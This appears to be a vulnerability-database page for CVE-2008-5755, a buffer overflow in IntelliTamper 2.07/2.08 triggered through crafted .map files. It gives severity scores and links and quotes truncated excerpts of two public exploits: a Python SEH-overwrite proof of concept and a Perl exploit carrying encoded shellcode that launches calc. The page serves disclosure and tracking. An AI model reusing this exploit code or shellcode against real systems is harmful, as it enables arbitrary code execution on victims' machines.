CVE-2008-5755
published 2008-12-30CVE-2008-5755: Stack-based buffer overflow in IntelliTamper 2.07 and 2.08 allows remote attackers to execute arbitrary code via a MAP file containing a long URL, possibly a…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.82%
92.2th percentile
Stack-based buffer overflow in IntelliTamper 2.07 and 2.08 allows remote attackers to execute arbitrary code via a MAP file containing a long URL, possibly a related issue to CVE-2006-2494.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intellitamper | intellitamper | — | — |
| intellitamper | intellitamper | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)
exploitdb·2008-12-28
CVE-2008-5755 IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)
IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)
---
#!/usr/bin/python
# IntelliTamper 2.07/2.08 (MAP File) 0-day Local SEH Overwrite Exploit
# Bug discovered by cN4phux
# Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR
# Shellcode: Windows Execute Command (calc)
# Here's the debugger output like what u see, the EIP overwritten & attempt to read from address 41414141 so the prog must be crashz . .
# EAX 0015B488 ECX 00123400 EDX 00123610
# EBX 00000000 ESP 00123604 EBP 00128B78
# ESI 00000000 EDI 00123A64 EIP 41414141
#Vive les Algeriens & greatz to friend's : me (XD) Heurs, Djug , Blub , His0k4 , Knuthy , Moorish , Ilyes ,
#Here's the the Poc :
import sys
map_theader = ((("\x23\x23\x23\x20\x53\x49\x54\x45\x4D"
"\x41\x50\x31\x20\x49\x4E\x54\x45\x4C"
"\x4C\x49\x54\x41\x4D\x50\x4
Exploit-DB
IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)
exploitdb·2008-07-21
CVE-2008-5755 IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)
IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)
---
#!/usr/bin/perl
# k`sOSe - 7/21/2008
# http://secunia.com/advisories/20172
# A sploit for an ancient vuln. Just because i need
# to improve my skills on windows explotation.
use warnings;
use strict;
# CMD="c:\windows\system32\calc.exe"
# [*] x86/alpha_mixed succeeded, final size 345
# bad char -> \x89
my $shellcode =
"\x54\x5a\xda\xd0\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" .
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" .
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" .
"\x4c\x4a\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55" .
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\
http://securityreason.com/securityalert/4839http://www.securityfocus.com/bid/33022https://exchange.xforce.ibmcloud.com/vulnerabilities/47741https://www.exploit-db.com/exploits/7582http://securityreason.com/securityalert/4839http://www.securityfocus.com/bid/33022https://exchange.xforce.ibmcloud.com/vulnerabilities/47741https://www.exploit-db.com/exploits/7582
2008-12-30
Published